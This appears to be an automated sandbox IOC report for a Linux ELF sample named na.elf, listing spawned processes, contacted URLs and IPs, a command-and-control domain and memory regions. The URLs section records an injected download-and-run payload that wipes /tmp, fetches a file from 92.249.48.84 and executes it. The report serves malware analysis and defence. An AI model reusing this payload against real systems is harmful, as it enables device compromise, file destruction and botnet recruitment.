IOC Report
na.elf

loading gif

Processes

Path
Cmdline
Malicious
/tmp/na.elf
/tmp/na.elf
/tmp/na.elf
-
/tmp/na.elf
-
/tmp/na.elf
-
/tmp/na.elf
-
/tmp/na.elf
-
/tmp/na.elf
-
/tmp/na.elf
-
/usr/bin/xfce4-panel
-
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
/usr/bin/xfce4-panel
-
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
/usr/bin/xfce4-panel
-
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
/usr/bin/xfce4-panel
-
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
-
/usr/sbin/xfpm-power-backlight-helper
/usr/sbin/xfpm-power-backlight-helper --get-max-brightness
/usr/bin/xfce4-panel
-
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
/usr/bin/xfce4-panel
-
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
/usr/bin/dbus-daemon
-
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
/usr/bin/dbus-daemon
-
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.kjfn9YX9xh /tmp/tmp.TUf8qCp3rV /tmp/tmp.P6a6B54VGD
/usr/bin/dash
-
/usr/bin/cat
cat /tmp/tmp.kjfn9YX9xh
/usr/bin/dash
-
/usr/bin/head
head -n 10
/usr/bin/dash
-
/usr/bin/tr
tr -d \\000-\\011\\013\\014\\016-\\037
/usr/bin/dash
-
/usr/bin/cut
cut -c -80
/usr/bin/dash
-
/usr/bin/cat
cat /tmp/tmp.kjfn9YX9xh
/usr/bin/dash
-
/usr/bin/head
head -n 10
/usr/bin/dash
-
/usr/bin/tr
tr -d \\000-\\011\\013\\014\\016-\\037
/usr/bin/dash
-
/usr/bin/cut
cut -c -80
/usr/bin/dash
-
/usr/bin/rm
rm -f /tmp/tmp.kjfn9YX9xh /tmp/tmp.TUf8qCp3rV /tmp/tmp.P6a6B54VGD
There are 36 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://92.249.48.84/bin
unknown
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+92.249.48.84/jaws;sh+/tmp/jaws
48.142.132.238
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown

Domains

Name
IP
Malicious
plutoc2.site
92.249.48.84

IPs

IP
Domain
Country
Malicious
178.156.193.121
unknown
Romania
58.224.90.217
unknown
Korea Republic of
197.10.137.32
unknown
Tunisia
117.201.9.234
unknown
India
169.246.74.23
unknown
United States
41.233.156.20
unknown
Egypt
5.99.177.232
unknown
Italy
197.233.228.82
unknown
Namibia
75.84.213.107
unknown
United States
212.29.134.46
unknown
Italy
37.132.200.40
unknown
Spain
197.43.225.174
unknown
Egypt
181.104.232.167
unknown
Argentina
148.79.127.85
unknown
United Kingdom
42.37.213.180
unknown
Korea Republic of
197.136.25.8
unknown
Kenya
42.16.158.43
unknown
Korea Republic of
37.187.76.119
unknown
France
118.2.165.63
unknown
Japan
156.23.113.247
unknown
United States
2.250.56.117
unknown
Sweden
156.146.54.81
unknown
United States
38.163.119.173
unknown
United States
196.2.134.197
unknown
South Africa
156.3.86.173
unknown
United States
43.61.49.52
unknown
Japan
4.209.22.131
unknown
United States
41.227.233.227
unknown
Tunisia
100.4.94.87
unknown
United States
148.192.87.27
unknown
United States
41.91.211.160
unknown
Egypt
197.90.74.68
unknown
South Africa
208.4.152.243
unknown
United States
23.87.103.128
unknown
United States
212.211.212.5
unknown
Germany
156.223.50.236
unknown
Egypt
197.212.229.4
unknown
Zambia
5.26.4.155
unknown
Turkey
197.249.181.85
unknown
Mozambique
50.173.113.183
unknown
United States
202.189.71.204
unknown
Australia
41.124.253.219
unknown
South Africa
41.169.198.171
unknown
South Africa
197.4.29.23
unknown
Tunisia
99.119.72.226
unknown
United States
156.44.103.2
unknown
Canada
41.239.218.22
unknown
Egypt
156.67.60.68
unknown
Spain
189.225.224.10
unknown
Mexico
4.0.229.155
unknown
United States
216.204.175.43
unknown
United States
41.27.51.187
unknown
South Africa
37.250.252.6
unknown
Sweden
197.140.232.131
unknown
Algeria
41.6.4.195
unknown
South Africa
91.181.131.228
unknown
Belgium
58.51.252.51
unknown
China
216.28.163.223
unknown
United States
212.44.162.234
unknown
Germany
157.37.77.202
unknown
India
19.209.85.222
unknown
United States
168.196.168.228
unknown
Brazil
161.138.191.11
unknown
Bolivia
149.112.233.190
unknown
Reserved
44.46.250.42
unknown
United States
197.69.35.14
unknown
South Africa
178.10.231.71
unknown
Germany
148.49.234.30
unknown
United States
197.23.201.58
unknown
Tunisia
5.17.173.26
unknown
Russian Federation
54.123.98.147
unknown
United States
41.42.142.171
unknown
Egypt
197.20.132.111
unknown
Tunisia
157.153.30.196
unknown
United States
60.206.158.229
unknown
China
59.122.129.97
unknown
Taiwan; Republic of China (ROC)
147.229.176.50
unknown
Czech Republic
206.90.119.97
unknown
United States
156.158.50.37
unknown
Tanzania United Republic of
143.2.251.174
unknown
United States
34.225.173.254
unknown
United States
41.127.73.143
unknown
South Africa
101.30.244.191
unknown
China
9.123.120.231
unknown
United States
13.101.153.40
unknown
United States
25.133.163.145
unknown
United Kingdom
109.96.50.0
unknown
Romania
156.70.138.53
unknown
United States
152.89.87.14
unknown
Netherlands
123.222.254.101
unknown
Japan
196.9.24.75
unknown
South Africa
5.72.153.231
unknown
Iran (ISLAMIC Republic Of)
123.222.96.192
unknown
Japan
53.210.65.26
unknown
Germany
197.3.15.225
unknown
Tunisia
156.188.232.16
unknown
Egypt
41.217.104.38
unknown
Nigeria
148.30.136.176
unknown
United States
212.192.64.237
unknown
Russian Federation
101.88.117.150
unknown
China
There are 90 hidden IPs, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7f88a4026000
page execute read
 malicious
7f88a4026000
page execute read
 malicious
7f89ac9ad000
page read and write
7f89acb23000
page read and write
7f89ac27b000
page read and write
55d1b2c36000
page read and write
7f89ab7db000
page read and write
55d1b29ff000
page execute read
55d1b4c34000
page execute and read and write
7f88a4038000
page read and write
55d1b2c2d000
page read and write
7f89acade000
page read and write
7f89abfde000
page read and write
55d1b29ff000
page execute read
7f89a4021000
page read and write
7f89a4000000
page read and write
55d1b4c34000
page execute and read and write
55d1b2c36000
page read and write
7f89acad6000
page read and write
7f88a4036000
page read and write
7f89acade000
page read and write
7f89ab7db000
page read and write
7f88a4038000
page read and write
7fff5d91f000
page read and write
7f89a4021000
page read and write
55d1b5ff7000
page read and write
7f88a4036000
page read and write
7fff5d91f000
page read and write
7f89acb23000
page read and write
7f89abfec000
page read and write
55d1b5ff7000
page read and write
7f89ac63d000
page read and write
7f89ac27b000
page read and write
55d1b2c2d000
page read and write
7f89ac63d000
page read and write
7f89ac9ad000
page read and write
55d1b4c4b000
page read and write
7f89a4000000
page read and write
55d1b4c4b000
page read and write
7f89ac662000
page read and write
7f89ac662000
page read and write
7fff5d945000
page execute read
7f89abfde000
page read and write
7f89acad6000
page read and write
7fff5d945000
page execute read
7f89abfec000
page read and write
There are 36 hidden memdumps, click here to show them.